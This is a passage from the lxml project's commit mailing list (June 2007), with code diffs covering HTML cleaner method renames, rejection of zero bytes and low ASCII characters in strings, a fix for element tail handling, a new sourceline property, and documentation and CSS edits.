for el in doc.getiterator('image'): @@ -205,7 +205,7 @@ el.set('style', new) for el in list(doc.getiterator('style')): if el.get('type', '').lower().strip() == 'text/javascript': - el.drop_element() + el.drop_tree() continue old = el.text or '' new = _css_javascript_re.sub('', old) @@ -230,9 +230,9 @@ # del el.attrib['xmlns'] if style: kill_tags.add('style') - for el in doc.getiterator('link'): + for el in list(doc.getiterator('link')): if 'stylesheet' in el.get('rel', '').lower(): - el.drop_element() + el.drop_tree() for el in _find_styled_elements(doc): del el.attrib['style'] if links: @@ -288,9 +288,9 @@ el.clear() for el in _kill: - el.drop_element() + el.drop_tree() for el in _remove: - el.drop_tag() + el.drop_element() if remove_unknown_tags: if allow_tags: @@ -304,10 +304,10 @@ bad.append(el) if strip_tags: for el in bad: - el.drop_tag() + el.drop_element() else: for el in bad: - el.drop_element() + el.drop_tree() if add_nofollow: for el in _find_external_links(doc): el.set('rel', 'nofollow') @@ -356,7 +356,7 @@ """ if el.tag in avoid_elements: return - class_name = el.attrib.get('class') + class_name = el.get('class') if class_name: class_name = class_name.split() for match_class in avoid_classes: @@ -428,7 +428,7 @@ assert not leading_text leading_text = prev_text anchor = factory('a') - anchor.attrib['href'] = link + anchor.set('href', link) body = best_match.group('body') if not body: body = link @@ -478,7 +478,7 @@ # http://www.cs.tut.fi/~jkorpela/html/nobr.html if el.tag in _avoid_word_break_elements: return - class_name = el.attrib.get('class') + class_name = el.get('class') if class_name: dont_break = False class_name = class_name.split() Modified: lxml/branch/html/src/lxml/html/diff.py ============================================================================== --- lxml/branch/html/src/lxml/html/diff.py (original) +++ lxml/branch/html/src/lxml/html/diff.py Sat Jun 9 16:44:51 2007 @@ -516,7 +516,7 @@ included as a special kind of diffable token.""" 
body_el = parse_html(html, cleanup=True) # Then we split the document into text chunks for each tag, word, and end tag: - chunks = flatten_el(body_el, drop_tag=True, include_hrefs=include_hrefs) + chunks = flatten_el(body_el, skip_tag=True, include_hrefs=include_hrefs) # Finally re-joining them into token objects: return fixup_chunks(chunks) @@ -657,14 +657,14 @@ ) -def flatten_el(el, include_hrefs, drop_tag=False): +def flatten_el(el, include_hrefs, skip_tag=False): """ Takes an lxml element el, and generates all the text chunks for that tag. Each start tag is a chunk, each word is a chunk, and each end tag is a chunk. - If drop_tag is true, then the outermost container tag is + If skip_tag is true, then the outermost container tag is not returned (just its contents).""" - if not drop_tag: + if not skip_tag: if el.tag == 'img': yield ('img', el.attrib['src'], start_tag(el)) else: @@ -679,7 +679,7 @@ yield item if el.tag == 'a' and el.attrib.get('href') and include_hrefs: yield ('href', el.attrib['href']) - if not drop_tag: + if not skip_tag: yield end_tag(el) end_words = split_words(el.tail) for word in end_words: @@ -729,14 +729,14 @@ <p><ins>word</ins></p> """ doc = parse_html(html, cleanup=False) _fixup_ins_del_tags(doc) - html = serialize_html_fragment(doc, drop_outer=True) + html = serialize_html_fragment(doc, skip_outer=True) return html -def serialize_html_fragment(el, drop_outer=False): +def serialize_html_fragment(el, skip_outer=False): """ Serialize a single lxml element as HTML. The serialized form includes the elements tail. 
- If drop_outer is true, then don't serialize the outermost tag + If skip_outer is true, then don't serialize the outermost tag """ html_xsl = """\ @@ -751,13 +751,13 @@ assert not isinstance(el, basestring), ( "You should pass in an element, not a string like %r" % el) html = str(transform(el)) - if drop_outer: + if skip_outer: # Get rid of the extra starting tag: html = html[html.find('>')+1:] - if drop_outer: + if skip_outer: # Get rid of the extra end tag: html = html[:html.rfind('<')] - if drop_outer: + if skip_outer: return html.strip() else: return html.lstrip() @@ -770,7 +770,7 @@ if not _contains_block_level_tag(el): continue _move_el_inside_block(el, tag=tag) - el.drop_tag() + el.drop_element() #_merge_element_contents(el) def _contains_block_level_tag(el): Modified: lxml/branch/html/src/lxml/html/tests/test_basic.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_basic.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_basic.txt Sat Jun 9 16:44:51 2007 @@ -52,7 +52,7 @@ >>> el.text_content() 'This is a bold link' -Or drop both tags (leaving content) or the entire element, like:: +Or drop an element (leaving its content) or the entire tree, like:: >>> doc = HTML(''' ... <html> @@ -63,7 +63,7 @@ ... <div>footer</div> ... </body> ... 
</html>''') - >>> doc.get_element_by_id('link').drop_tag() + >>> doc.get_element_by_id('link').drop_element() >>> print tostring(doc) <html> <body> @@ -73,7 +73,7 @@ <div>footer</div> </body> </html> - >>> doc.get_element_by_id('body').drop_element() + >>> doc.get_element_by_id('body').drop_tree() >>> print tostring(doc) <html> <body> From scoder at codespeak.net Sat Jun 9 16:52:59 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 9 Jun 2007 16:52:59 +0200 (CEST) Subject: [Lxml-checkins] r44116 - lxml/trunk/src/lxml Message-ID: <20070609145259.BF74380D0@code0.codespeak.net> Author: scoder Date: Sat Jun 9 16:52:58 2007 New Revision: 44116 Modified: lxml/trunk/src/lxml/parser.pxi Log: missing kw arg default value Modified: lxml/trunk/src/lxml/parser.pxi ============================================================================== --- lxml/trunk/src/lxml/parser.pxi (original) +++ lxml/trunk/src/lxml/parser.pxi Sat Jun 9 16:52:58 2007 @@ -778,7 +778,7 @@ __GLOBAL_PARSER_CONTEXT.setDefaultParser(__DEFAULT_XML_PARSER) -def setDefaultParser(parser): +def setDefaultParser(parser=None): "Deprecated, please use set_default_parser instead." set_default_parser(parser) From scoder at codespeak.net Sat Jun 9 16:55:11 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 9 Jun 2007 16:55:11 +0200 (CEST) Subject: [Lxml-checkins] r44117 - in lxml/trunk: . 
src/lxml src/lxml/tests Message-ID: <20070609145511.58E3E80D0@code0.codespeak.net> Author: scoder Date: Sat Jun 9 16:55:10 2007 New Revision: 44117 Modified: lxml/trunk/CHANGES.txt lxml/trunk/src/lxml/apihelpers.pxi lxml/trunk/src/lxml/tests/test_etree.py lxml/trunk/src/lxml/tree.pxd Log: check incoming strings for low ASCII characters Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Sat Jun 9 16:55:10 2007 @@ -50,6 +50,9 @@ Bugs fixed ---------- +* API functions now check incoming strings for XML conformity. Zero bytes or + low ASCII characters are no longer accepted. + * The XML parser did not report undefined entities as error * The text in exceptions raised by XML parsers, validators and XPath Modified: lxml/trunk/src/lxml/apihelpers.pxi ============================================================================== --- lxml/trunk/src/lxml/apihelpers.pxi (original) +++ lxml/trunk/src/lxml/apihelpers.pxi Sat Jun 9 16:55:10 2007 @@ -595,16 +595,20 @@ cdef char* s cdef char* c_end cdef char c + cdef int is_non_ascii s = _cstr(pystring) c_end = s + python.PyString_GET_SIZE(pystring) + is_non_ascii = 0 while s < c_end: c = s[0] + if c & 0x80: + is_non_ascii = 1 if c == c'\0': return -1 # invalid! - if c & 0x80: - return 1 # non-ASCII + if is_non_ascii == 0 and not tree.xmlIsChar_ch(c): + return -1 # invalid! s = s + 1 - return 0 # plain 7-bit ASCII + return is_non_ascii cdef object funicode(char* s): cdef Py_ssize_t slen @@ -625,12 +629,15 @@ cdef object _utf8(object s): if python.PyString_Check(s): assert not isutf8py(s), \ - "All strings must be Unicode or ASCII" - return s + "All strings must be XML compatible, either Unicode or ASCII" elif python.PyUnicode_Check(s): - return python.PyUnicode_AsUTF8String(s) + # FIXME: we should test these strings, too ... 
+ s = python.PyUnicode_AsUTF8String(s) + assert isutf8py(s) != -1, \ + "All strings must be XML compatible, either Unicode or ASCII" else: raise TypeError, "Argument must be string or unicode." + return s cdef object _encodeFilename(object filename): if filename is None: Modified: lxml/trunk/src/lxml/tests/test_etree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_etree.py (original) +++ lxml/trunk/src/lxml/tests/test_etree.py Sat Jun 9 16:55:10 2007 @@ -1433,6 +1433,41 @@ self.assertRaises(AssertionError, Element, 'ha\0ho') + def test_unicode_byte_zero(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\0ho') + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\0ho') + + self.assertRaises(AssertionError, Element, u'ha\0ho') + + def test_byte_invalid(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\x02ho') + + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\x02ho') + + self.assertRaises(AssertionError, Element, 'ha\x07ho') + self.assertRaises(AssertionError, Element, 'ha\x02ho') + + def test_unicode_byte_invalid(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\x02ho') + + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\x02ho') + + self.assertRaises(AssertionError, Element, u'ha\x07ho') + self.assertRaises(AssertionError, Element, u'ha\x02ho') + def test_encoding_tostring_utf16(self): # ElementTree fails to serialize this tostring = self.etree.tostring Modified: lxml/trunk/src/lxml/tree.pxd 
============================================================================== --- lxml/trunk/src/lxml/tree.pxd (original) +++ lxml/trunk/src/lxml/tree.pxd Sat Jun 9 16:55:10 2007 @@ -41,6 +41,9 @@ cdef xmlCharEncoding xmlDetectCharEncoding(char* text, int len) cdef char* xmlGetCharEncodingName(xmlCharEncoding enc) +cdef extern from "libxml/chvalid.h": + cdef int xmlIsChar_ch(char c) + cdef extern from "libxml/hash.h": ctypedef struct xmlHashTable ctypedef void xmlHashScanner(void* payload, void* data, char* name) From scoder at codespeak.net Sun Jun 10 14:44:11 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 10 Jun 2007 14:44:11 +0200 (CEST) Subject: [Lxml-checkins] r44123 - lxml/branch/proxy-dealloc Message-ID: <20070610124411.D4ACD80CB@code0.codespeak.net> Author: scoder Date: Sun Jun 10 14:44:10 2007 New Revision: 44123 Added: lxml/branch/proxy-dealloc/ - copied from r44122, lxml/trunk/ Log: new branch for a partial rewrite of the proxy cleanup code From scoder at codespeak.net Sun Jun 10 16:41:06 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 10 Jun 2007 16:41:06 +0200 (CEST) Subject: [Lxml-checkins] r44124 - lxml/pyrex/Pyrex/Compiler Message-ID: <20070610144106.2928B8100@code0.codespeak.net> Author: scoder Date: Sun Jun 10 16:41:04 2007 New Revision: 44124 Modified: lxml/pyrex/Pyrex/Compiler/ModuleNode.py Log: bug fix by Arc Riley Modified: lxml/pyrex/Pyrex/Compiler/ModuleNode.py ============================================================================== --- lxml/pyrex/Pyrex/Compiler/ModuleNode.py (original) +++ lxml/pyrex/Pyrex/Compiler/ModuleNode.py Sun Jun 10 16:41:04 2007 @@ -383,7 +383,8 @@ entry.type.typeptr_cname) code.put_var_declarations(env.var_entries, static = 1, dll_linkage = "DL_EXPORT", definition = definition) - code.put_var_declarations(env.default_entries, static = 1) + code.put_var_declarations(env.default_entries, static = 1, + definition = definition) def 
generate_cfunction_predeclarations(self, env, code): for entry in env.cfunc_entries: From scoder at codespeak.net Tue Jun 12 15:42:55 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 15:42:55 +0200 (CEST) Subject: [Lxml-checkins] r44165 - in lxml/trunk: . src/lxml src/lxml/tests Message-ID: <20070612134255.EEBFC817D@code0.codespeak.net> Author: scoder Date: Tue Jun 12 15:42:54 2007 New Revision: 44165 Modified: lxml/trunk/CHANGES.txt lxml/trunk/src/lxml/apihelpers.pxi lxml/trunk/src/lxml/etree.pyx lxml/trunk/src/lxml/tests/test_elementtree.py Log: fix: replacing the children slice of an Element cut off the children's tails Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Tue Jun 12 15:42:54 2007 @@ -50,6 +50,9 @@ Bugs fixed ---------- +* Replacing the children slice of an Element would cut off the tails of the + original children + * API functions now check incoming strings for XML conformity. Zero bytes or low ASCII characters are no longer accepted. Modified: lxml/trunk/src/lxml/apihelpers.pxi ============================================================================== --- lxml/trunk/src/lxml/apihelpers.pxi (original) +++ lxml/trunk/src/lxml/apihelpers.pxi Tue Jun 12 15:42:54 2007 @@ -485,7 +485,10 @@ cdef void _removeNode(xmlNode* c_node): """Unlink and free a node and subnodes if possible. 
""" + cdef xmlNode* c_next + c_next = c_node.next tree.xmlUnlinkNode(c_node) + _moveTail(c_next, c_node) attemptDeallocation(c_node) cdef void _moveTail(xmlNode* c_tail, xmlNode* c_target): @@ -526,8 +529,8 @@ while c_node is not NULL and c < stop: c_next = c_node.next if _isElement(c_node): - _removeText(c_node.next) - c_next = c_node.next + while c_next is not NULL and not _isElement(c_next): + c_next = c_next.next _removeNode(c_node) c = c + 1 c_node = c_next Modified: lxml/trunk/src/lxml/etree.pyx ============================================================================== --- lxml/trunk/src/lxml/etree.pyx (original) +++ lxml/trunk/src/lxml/etree.pyx Tue Jun 12 15:42:54 2007 @@ -486,7 +486,7 @@ else: c_node = _findChild(self._c_node, start) # now delete the slice - if start != stop: + if c_node is not NULL and start != stop: c_node = _deleteSlice(c_node, start, stop) # if the insertion point is at the end, append there if c_node is NULL: @@ -597,8 +597,8 @@ while c_node is not NULL: c_node_next = c_node.next if _isElement(c_node): - _removeText(c_node_next) - c_node_next = c_node.next + while c_node_next is not NULL and not _isElement(c_node_next): + c_node_next = c_node_next.next _removeNode(c_node) c_node = c_node_next Modified: lxml/trunk/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_elementtree.py (original) +++ lxml/trunk/src/lxml/tests/test_elementtree.py Tue Jun 12 15:42:54 2007 @@ -1161,6 +1161,26 @@ self.assertXML('<b><bs></bs></b>', b) self.assertXML('<c><cs></cs></c>', c) + def test_delslice_tail(self): + XML = self.etree.XML + a = XML('<a><b></b>B2<c></c>C2</a>') + b, c = a + + del a[:] + + self.assertEquals("B2", b.tail) + self.assertEquals("C2", c.tail) + + def test_replace_slice_tail(self): + XML = self.etree.XML + a = XML('<a><b></b>B2<c></c>C2</a>') + b, c = a + + a[:] = [] + + self.assertEquals("B2", b.tail) + self.assertEquals("C2", 
c.tail) + def test_delitem_tail(self): ElementTree = self.etree.ElementTree f = StringIO('<a><b></b>B2<c></c>C2</a>') From scoder at codespeak.net Tue Jun 12 17:46:45 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 17:46:45 +0200 (CEST) Subject: [Lxml-checkins] r44168 - lxml/branch/lxml-1.3 Message-ID: <20070612154645.7227D8188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 17:46:45 2007 New Revision: 44168 Added: lxml/branch/lxml-1.3/ - copied from r39786, lxml/trunk/ Log: new branch for work on 1.3 (to leave 2.0 stuff in the trunk) From scoder at codespeak.net Tue Jun 12 17:55:16 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 17:55:16 +0200 (CEST) Subject: [Lxml-checkins] r44169 - lxml/branch/lxml-1.3 Message-ID: <20070612155516.EAE928188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 17:55:11 2007 New Revision: 44169 Modified: lxml/branch/lxml-1.3/ (props changed) Log: external svn ref to Pyrex From scoder at codespeak.net Tue Jun 12 18:01:00 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:01:00 +0200 (CEST) Subject: [Lxml-checkins] r44170 - in lxml/branch/lxml-1.3: . src/lxml Message-ID: <20070612160100.38E3E8188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:00:59 2007 New Revision: 44170 Modified: lxml/branch/lxml-1.3/TODO.txt lxml/branch/lxml-1.3/src/lxml/extensions.pxi lxml/branch/lxml-1.3/src/lxml/parser.pxi lxml/branch/lxml-1.3/src/lxml/xpath.pxi lxml/branch/lxml-1.3/src/lxml/xslt.pxi Log: merged in revs 39788:40177 from trunk Modified: lxml/branch/lxml-1.3/TODO.txt ============================================================================== --- lxml/branch/lxml-1.3/TODO.txt (original) +++ lxml/branch/lxml-1.3/TODO.txt Tue Jun 12 18:00:59 2007 @@ -41,5 +41,5 @@ Features -------- -* Relaxed NG compact notation (rnc versus rng) support. 
Currently not - supported by libxml2 (patch exists) +* RelaxNG compact notation (rnc versus rng) support. Currently not supported + by libxml2 (patch exists) Modified: lxml/branch/lxml-1.3/src/lxml/extensions.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/extensions.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/extensions.pxi Tue Jun 12 18:00:59 2007 @@ -102,16 +102,16 @@ # namespaces (internal UTF-8 methods with leading '_') - def addNamespace(self, prefix, uri): + cdef addNamespace(self, prefix, uri): if self._namespaces is None: self._namespaces = {} python.PyDict_SetItem(self._namespaces, prefix, uri) - def registerNamespaces(self, namespaces): + cdef registerNamespaces(self, namespaces): for prefix, uri in namespaces.items(): self.registerNamespace(prefix, uri) - def registerNamespace(self, prefix, ns_uri): + cdef registerNamespace(self, prefix, ns_uri): prefix_utf = self._to_utf(prefix) ns_uri_utf = self._to_utf(ns_uri) xpath.xmlXPathRegisterNs(self._xpathCtxt, prefix_utf, ns_uri_utf) @@ -238,12 +238,14 @@ cdef xpath.xmlXPathFunction _function_check(void* ctxt, char* c_name, char* c_ns_uri): "Module level lookup function for XPath/XSLT functions" + cdef xpath.xmlXPathFunction c_func cdef _BaseContext context context = <_BaseContext>ctxt if context._prepare_function_call(c_ns_uri, c_name): - return _call_prepared_function + c_func = _call_prepared_function else: - return NULL + c_func = NULL + return c_func cdef xpath.xmlXPathObject* _wrapXPathObject(object obj) except NULL: cdef xpath.xmlNodeSet* resultSet @@ -358,7 +360,6 @@ cdef void _extension_function_call(_BaseContext context, function, xpath.xmlXPathParserContext* ctxt, int nargs): - cdef _Element node cdef _Document doc cdef xpath.xmlXPathObject* obj cdef int i Modified: lxml/branch/lxml-1.3/src/lxml/parser.pxi ============================================================================== --- 
lxml/branch/lxml-1.3/src/lxml/parser.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/parser.pxi Tue Jun 12 18:00:59 2007 @@ -406,7 +406,7 @@ if pctxt.spaceTab is not NULL: # work around bug in libxml2 xmlparser.xmlClearParserCtxt(pctxt) - cdef int _lockParser(self) except 1: + cdef int _lockParser(self) except -1: cdef python.PyThreadState* state cdef int result if config.ENABLE_THREADING and self._parser_lock != NULL: Modified: lxml/branch/lxml-1.3/src/lxml/xpath.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xpath.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xpath.pxi Tue Jun 12 18:00:59 2007 @@ -143,9 +143,8 @@ def registerNamespaces(self, namespaces): """Register a prefix -> uri dict. """ - add = self._context.addNamespace for prefix, uri in namespaces.items(): - add(prefix, uri) + self._context.addNamespace(prefix, uri) def __call__(self, _path, **_variables): """Evaluate an XPath expression on the document. Modified: lxml/branch/lxml-1.3/src/lxml/xslt.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xslt.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xslt.pxi Tue Jun 12 18:00:59 2007 @@ -1,4 +1,4 @@ -# XSLT and XPath classes, supports for extension functions +# XSLT cimport xslt @@ -265,6 +265,15 @@ cdef class XSLT: """Turn a document into an XSLT object. + + Keyword arguments of the constructor: + * regexp - enable exslt regular expression support in XPath (default: True) + * access_control - access restrictions for network or file system + + Keyword arguments of the XSLT run: + * profile_run - enable XSLT profiling + + Other keyword arguments are passed to the stylesheet. 
""" cdef _XSLTContext _context cdef xslt.xsltStylesheet* _c_style @@ -415,6 +424,7 @@ if params is not NULL: # deallocate space for parameters python.PyMem_Free(params) + keep_ref = None if transform_ctxt.profile: c_profile_doc = xslt.xsltGetProfileInformation(transform_ctxt) From scoder at codespeak.net Tue Jun 12 18:02:21 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:02:21 +0200 (CEST) Subject: [Lxml-checkins] r44171 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070612160221.AD45C8188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:02:20 2007 New Revision: 44171 Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx Log: merged in rev 40611 from trunk Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 18:02:20 2007 @@ -1289,7 +1289,7 @@ def relaxng(self, relaxng): """Validate this document using other document. - relaxng is a tree that should contain Relax NG XML + The relaxng argument is a tree that should contain a Relax NG schema. Returns True or False, depending on whether validation succeeded. @@ -1305,7 +1305,7 @@ def xmlschema(self, xmlschema): """Validate this document using other document. - xmlschema is a tree that should contain XML Schema XML. + The xmlschema argument is a tree that should contain an XML Schema. Returns True or False, depending on whether validation succeeded. @@ -1321,7 +1321,13 @@ def xinclude(self): """Process the XInclude nodes in this document and include the referenced XML fragments. + + There is support for loading files through the file system, HTTP and + FTP. + + Note that XInclude does not support custom resolvers in Python space. 
""" + cdef python.PyThreadState* state cdef int result # We cannot pass the XML_PARSE_NOXINCNODE option as this would free # the XInclude nodes - there may still be Python references to them! @@ -1331,13 +1337,15 @@ # typed as elements. The included fragment is added between the two, # i.e. as a sibling, which does not conflict with traversal. self._assertHasRoot() - if self._context_node._doc._parser != None: + state = python.PyEval_SaveThread() + if self._context_node._doc._parser is not None: result = xinclude.xmlXIncludeProcessTreeFlags( self._context_node._c_node, self._context_node._doc._parser._parse_options) else: result = xinclude.xmlXIncludeProcessTree( self._context_node._c_node) + python.PyEval_RestoreThread(state) if result == -1: raise XIncludeError, "XInclude processing failed" From scoder at codespeak.net Tue Jun 12 18:06:29 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:06:29 +0200 (CEST) Subject: [Lxml-checkins] r44172 - in lxml/branch/lxml-1.3: benchmark doc doc/html src/lxml src/lxml/tests Message-ID: <20070612160629.116658188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:06:23 2007 New Revision: 44172 Modified: lxml/branch/lxml-1.3/benchmark/bench_xpath.py lxml/branch/lxml-1.3/doc/FAQ.txt lxml/branch/lxml-1.3/doc/html/style.css lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/python.pxd lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py lxml/branch/lxml-1.3/src/lxml/tests/test_xpathevaluator.py lxml/branch/lxml-1.3/src/lxml/tree.pxd Log: merged in revs 40611:41008 from trunk Modified: lxml/branch/lxml-1.3/benchmark/bench_xpath.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_xpath.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_xpath.py Tue Jun 12 18:06:23 2007 @@ -34,7 +34,7 @@ child.xpath("./*[0]") @onlylib('lxe') - def 
bench_xpath_extensions_old(self, root): + def bench_xpath_old_extensions(self, root): def return_child(_, element): if element: return element[0] @@ -45,5 +45,21 @@ for child in root: xpath(child) + @onlylib('lxe') + def bench_xpath_extensions(self, root): + def return_child(_, element): + if element: + return element[0] + else: + return () + self.etree.FunctionNamespace("test")["t"] = return_child + + try: + xpath = self.etree.XPath("test:t(.)", {"test":"test"}) + for child in root: + xpath(child) + finally: + del self.etree.FunctionNamespace("test")["t"] + if __name__ == '__main__': benchbase.main(XPathBenchMark) Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Tue Jun 12 18:06:23 2007 @@ -12,10 +12,11 @@ 1 General Questions 1.1 Is there a tutorial? 1.2 Where can I find more documentation about lxml? - 1.3 Where are the Windows binaries? - 1.4 What is the difference between lxml.etree and lxml.objectify? - 1.5 Why is my application so slow? - 1.6 Why do I get errors about missing UCS4 symbols when installing lxml? + 1.3 What standards does lxml implement? + 1.4 Where are the Windows binaries? + 1.5 What is the difference between lxml.etree and lxml.objectify? + 1.6 Why is my application so slow? + 1.7 Why do I get errors about missing UCS4 symbols when installing lxml? 2 Bugs 2.1 My application crashes! Why does lxml.etree do that? 2.2 I think I have found a bug in lxml. What should I do? @@ -64,6 +65,24 @@ .. _`the web page`: http://codespeak.net/lxml/#documentation +What standards does lxml implement? +----------------------------------- + +The compliance to XML Standards depends on the support in libxml2 and libxslt. +Here is a quote from `http://xmlsoft.org/`: + + In most cases libxml2 tries to implement the specifications in a relatively + strictly compliant way. 
As of release 2.4.16, libxml2 passed all 1800+ tests + from the OASIS XML Tests Suite. + +lxml currently supports libxml2 2.6.16 or later, which has even better support +for various XML standards. Some of the more important ones are: HTML, XML +namespaces, XPath, XInclude, XSLT, XML catalogs, canonical XML, RelaxNG, +XML:ID. Support for XML Schema and Schematron is currently incomplete in +libxml2, but is mostly usable and still being worked on. libxml2 also +supports loading documents through HTTP and FTP. + + Where are the Windows binaries? ------------------------------- Modified: lxml/branch/lxml-1.3/doc/html/style.css ============================================================================== --- lxml/branch/lxml-1.3/doc/html/style.css (original) +++ lxml/branch/lxml-1.3/doc/html/style.css Tue Jun 12 18:06:23 2007 @@ -67,10 +67,12 @@ font-size: 130%; } -div.sidemenu ul.menu.current > li { - color: orange; - border: groove orange; - background-color: #FFFACA; +div.sidemenu ul.menu.current li { + color: #CC0000; +} + +div.sidemenu ul.menu.current > li > a { + color: #CC0000; } div.sidemenu ul.menu.current ul.submenu { @@ -85,12 +87,13 @@ div.sidemenu ul.menu.foreign li.menu:hover ul.submenu { display: block; position: absolute; - border: groove orange; + border: groove #990000; padding: 1ex 1ex 1ex 3ex; margin-top: 0px; margin-left: 4em; margin-right: -20em; - background-color: #FFFACA; + color: #990000; + background-color: white; } div.sidemenu ul.submenu { @@ -121,7 +124,7 @@ @media screen { div.section > h1 > a:before { margin-left: -2ex; - color: orange; + color: #CC0000; content: "\00BB" " "; } } Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 18:06:23 2007 @@ -673,6 +673,24 @@ return None # not in ElementTree, read-only + property sourceline: + """Original line 
number as found by the parser or None if unknown. + """ + def __get__(self): + cdef long line + line = tree.xmlGetLineNo(self._c_node) + if line > 0: + return line + else: + return None + + def __set__(self, line): + if line < 0: + self._c_node.line = 0 + else: + self._c_node.line = line + + # not in ElementTree, read-only property nsmap: """Namespace prefix->URI mapping known in the context of this Element. """ Modified: lxml/branch/lxml-1.3/src/lxml/python.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/python.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/python.pxd Tue Jun 12 18:06:23 2007 @@ -44,7 +44,8 @@ cdef int PyList_Append(object l, object obj) except -1 cdef int PyList_Reverse(object l) except -1 cdef int PyList_Insert(object l, Py_ssize_t index, object o) except -1 - cdef object PyList_AsTuple(object o) + cdef object PyList_AsTuple(object l) + cdef void PyList_Clear(object l) cdef int PyDict_SetItemString(object d, char* key, object value) except -1 cdef int PyDict_SetItem(object d, object key, object value) except -1 Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Tue Jun 12 18:06:23 2007 @@ -1119,6 +1119,37 @@ ["tail0", "tail1", "tail2", "TAIL0", "TAIL1", "TAIL2"], [ el.tail for el in root ]) + def test_sourceline_XML(self): + XML = self.etree.XML + root = XML('''<?xml version="1.0"?> + <root><test> + + <bla/></test> + </root> + ''') + + self.assertEquals( + [2, 2, 4], + [ el.sourceline for el in root.getiterator() ]) + + def test_sourceline_parse(self): + parse = self.etree.parse + tree = parse(fileInTestDir('test_xinclude.xml')) + + self.assertEquals( + [1, 2, 3], + [ el.sourceline for el in tree.getiterator() ]) + + def test_sourceline_element(self): + Element = 
self.etree.Element + SubElement = self.etree.SubElement + el = Element("test") + self.assertEquals(None, el.sourceline) + + child = SubElement(el, "test") + self.assertEquals(None, el.sourceline) + self.assertEquals(None, child.sourceline) + def test_docinfo_public(self): etree = self.etree xml_header = '<?xml version="1.0" encoding="ascii"?>' Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Tue Jun 12 18:06:23 2007 @@ -1,10 +1,7 @@ # -*- coding: utf-8 -*- """ -Tests specific to the extended etree API - -Tests that apply to the general ElementTree API should go into -test_elementtree +Tests specific to the lxml.objectify API """ @@ -28,7 +25,7 @@ </obj:root>''' class ObjectifyTestCase(HelperTestCase): - """Test cases for lxml.elementlib.objectify + """Test cases for lxml.objectify """ etree = etree Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_xpathevaluator.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_xpathevaluator.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_xpathevaluator.py Tue Jun 12 18:06:23 2007 @@ -104,6 +104,10 @@ self.assertEquals( [root[0]], root.xpath('//baz:b', {'baz': 'uri:a'})) + + def test_xpath_ns_none(self): + tree = self.parse('<a 